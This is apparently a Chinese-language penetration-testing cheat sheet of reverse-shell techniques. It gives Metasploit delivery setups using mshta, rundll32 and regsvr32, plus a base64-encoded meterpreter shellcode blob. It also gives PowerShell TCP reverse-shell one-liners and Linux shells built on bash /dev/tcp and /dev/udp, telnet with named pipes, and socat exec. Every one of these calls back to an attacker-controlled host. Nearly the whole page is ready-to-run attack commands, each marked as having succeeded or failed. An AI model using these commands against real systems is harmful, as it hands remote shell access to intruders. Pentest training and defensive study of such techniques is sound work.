引子

以你现在的速度你只能逗留原地。如果你要抵达另一个地方，你必须以双倍于现在的速度奔跑。

思维导图和教程

windows

mshta.exe

成功的操作

use exploit/windows/misc/hta_server
set srvhost 10.100.19.19
set lhost 10.100.19.19
set SRVPORT 53
exploit

mshta.exe http://10.100.19.19:53/tA7YRzR.hta

失败的操作

设置payload msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.19.19 LPORT=53 -f raw > shellcode.bin

cat shellcode.bin | base64 -w 0 > out.txt 将shellcode.bin base64编码

/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCAAA1CgoTE0FUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1WoKQV5QUE0xyU0xwEj/wEiJwkj/wEiJwUG66g/f4P/VSInHahBBWEyJ4kiJ+UG6maV0Yf/VhcB0Ckn/znXl6JMAAABIg+wQSIniTTHJagRBWEiJ+UG6AtnIX//Vg/gAflVIg8QgXon2akBBWWgAEAAAQVhIifJIMclBulikU+X/1UiJw0mJx00xyUmJ8EiJ2kiJ+UG6AtnIX//Vg/gAfShYQVdZaABAAABBWGoAWkG6Cy8PMP/VV1lBunVuTWH/1Un/zuk8////SAHDSCnGSIX2dbRB/+dYagBZScfC8LWiVv/V

handler -H 10.100.19.19 -P 53 -p windows/meterpreter/reverse_tcp

mshta.exe http://10.100.19.19/CACTUSTORCH.hta

易错点

handler不能设置为exploit/multi/handler

rundll.exe

use windows/smb/smb_delivery

set srvhost 192.168.123.123

rundll32.exe \192.168.1.109\vabFG\test.dll,0

Regsvr32.exe

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 3
msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set srvhost 192.168.1.109
msf exploit (web_delivery)>exploit

powershell & powercat

nc -lnvp 4455

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("192.168.123.123",4455);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
这个代码反弹失败
---
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.123.123',4455);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

linux

bash

bash tcp

nc -lnvp 4456 bash -i >& /dev/tcp/18.166.7.104/4456 0>&1

bash2 （失败）

nc -lnvp 4456
exec 5<>/dev/tcp/18.166.7.104/4456
cat <&5 | while read line; do $line 2>&5 >&5; done

bash udp（失败）

nc -lnvp 4457 sh -i >& /dev/udp/18.166.7.104/4457 0>&1

sh

victim:

sh -i >& /dev/udp/192.168.3.253/4242 0>&1

Centos7:

csh -i >& /dev/udp/192.168.3.253/4242 0>&1

telnet

建立连接

nc -n -vv -l -p 8080 
nc -n -vv -l -p 8081
Victim 
telnet 18.166.7.104  8080 | /bin/bash | telnet 18.166.7.104  8081

反弹shell

nc -lnvp 4456
rm -f /tmp/p; mknod /tmp/p p && telnet 18.166.7.104 4456 0/tmp/p

socat

建立连接

目标机器监听： socat TCP4-listen:4433 STDOUT

本地连接目标机器： socat - TCP4:18.166.7.104:4433

反弹shell

vps(18.166.7.104)上监听： socat -d -d TCP4-LISTEN:4434 STDOUT

本地kali将shell发送到vps （内网机器运行）socat TCP4:18.166.7.104:4434 EXEC:/bin/bash

反弹shell 二

（18.166.7.104公网机器运行）socat TCP4-listen:4435 STDOUT
（内网机器运行）socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:18.166.7.104:4435

参考资料

https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/

https://hackersinterview.com/oscp/reverse-shell-one-liners-oscp-cheatsheet/